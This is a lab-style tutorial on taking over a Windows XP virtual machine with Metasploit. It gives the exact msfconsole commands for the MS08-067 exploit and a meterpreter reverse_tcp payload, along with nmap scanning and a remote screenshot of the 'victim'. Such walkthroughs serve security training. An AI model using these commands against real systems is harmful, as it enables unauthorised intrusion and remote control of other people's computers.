[Metasploit Tutorial] Hacking Windows XP using IP Address

[Metasploit Tutorial] Hacking Windows XP using IP Address

Step 1:

Create Two Virtual Machine(VM) namely “Target” and “BT5′′. Install the XP inside Target VM and

Backtrack inside BT5. Start the Two VMs.

If you don’t know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target

Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the

Target system.

Hackers use different method for finding the ip address of victim. For Eg., By sending link that will get the

ip details or use Angry IP Scanner.

Step 3: Information Gathering

Now let us collect some information about the Target machine. For this purpose , we are going to use the

nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type “nmap -O“. Here is IP address of Target machine. If you look at the result, you can find the list of open ports

and OS version.

Step 4: Metasploit

Now open the Terminal in the BT5 machine(Backtrack) and Type “msfconsole“.

The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” 

centralized console and allows you efficient access to virtually all of the options available in the Metasploit 


Let us use the Search command to find the exploit modules with the keyword netapi. Type “search 

netapi”. Now you can see the list of modules match with the netapi.

We are going to exploit MS08-067 , so type “use exploit/windows/smb/ms08_067_netapi“.

Step 5: Set Payload

As usual, let use the Reverse Tcp Payload for this exploit also. Type “set payload 

windows/meterpreter/reverse_tcp” in the msfconsole.

Step 6: Options

Type “set LHOST“. Here is IP address of Backtrack machine. You can find 

the ip address by typing ‘ifconfig’ command in the Terminal.

Type “set RHOST“. Here is IP address of Target machine.

Step 7: Exploiting

Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successful, you can 

see the following result.

Now we can control the remote computer using the meterpreter. For example, typing “screenshot” will grab 

the screenshot of the victim system.


Update your OS frequently.

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